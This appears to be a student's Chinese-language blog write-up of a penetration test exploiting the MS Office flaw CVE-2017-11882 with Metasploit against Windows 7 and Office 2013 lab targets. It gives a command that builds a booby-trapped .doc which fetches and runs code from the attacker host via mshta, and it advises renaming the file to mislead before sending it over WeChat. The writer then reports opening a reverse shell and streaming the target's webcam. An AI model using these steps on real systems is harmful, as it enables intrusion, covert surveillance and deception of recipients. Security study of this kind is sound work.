zoukankan      html  css  js  c++  java
  • MSF渗透测试-CVE-2017-11882(MSOffice漏洞)

    1.测试环境

    2.测试前准备

    3.测试过程

    —3.1虚拟机环境测试

    —3.2局域网靶机测试

    4.测试感想

    1.测试环境

    攻击机:

    OS:kail

    IP:192.168.15.132/192.168.137.231

    靶机:

    OS:Windows7

    Office版本:Office2013_CN

    IP:

    2.测试前准备

    1.下载python脚本

    2.下载MSF组件

    3.将cve_2017_11882.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目录下

    4.把下载的cve_2017_11882.rtf复制到/usr/share/metasploit-framework/data/exploits/目录下

    5.把Command109b_CVE-2017-11882.py复制到/root目录下

    3.测试过程

    3.1虚拟机环境测试

    1.msfconsole执行search命令

    2.设置payloadreverse_tcp,设置LHOST192.168.15.132,设置URIPATHtest(之后利用python脚本生成doc文件的时候也要使用相同路径)

    3.show options显示设置

    4.exploit -j运行

    5.另开一个terminalpython Command109b_CVE-2017-11882.py -c "mshta http://192.168.15.132:8080/test" -o kail_help.doc

    6.把生成的kail_help复制到靶机中打开,是个空白文档

    7.回连成功

    8.sessions -i 1接管活动会话1,shell可以看到已经成功渗透靶机

    3.2局域网靶机测试

    0.更改kail网络链接模式由NAT->桥接,获得一个与靶机在同一网段下的IP192.168.137.231

    1.更改一下LHOST,重新生成一个doc文件,exploit -j监听

    2.将文件改名为kail_help2.doc通过微信发给靶机(随便改啥,具有迷惑性就行)

    3.靶机打开doc,Windows7防火墙处于打开状态,无杀软

    4.攻击机获得回连,sessions -i 1接管

    5.webcam_stream可以直接控制摄像头进行直播

    6.shell中获取靶机桌面信息

    4.测试感想

    • 前人栽树,后人乘凉。githubmeterpreter-db上有漏洞相关的msf模块python脚本可以直接使用
    • 老旧系统、软件十分不靠谱,易于攻入。其实还实践了WindowsDefender+Windows10的组合,WinodowsDefender会直接将doc文件杀掉,但是这个版本的WIN7还是应用很广的,包括Office2013可以说是学生中应用十分广泛的版本(这个Windwos镜像和office2013都是徐日老师FTP服务器上的版本,在DKY安装率应该还是很有保证的)
  • 相关阅读:
    Java学习小记 29
    Java学习小记 28
    Java学习小记 27
    Java学习小记 26
    Java学习小记 25
    Java学习小记 24
    Java学习小记 23
    Java学习小记 22
    Java学习小记 21
    Java学习小记 20
  • 原文地址:https://www.cnblogs.com/zl20154312/p/8877386.html
Copyright © 2011-2022 走看看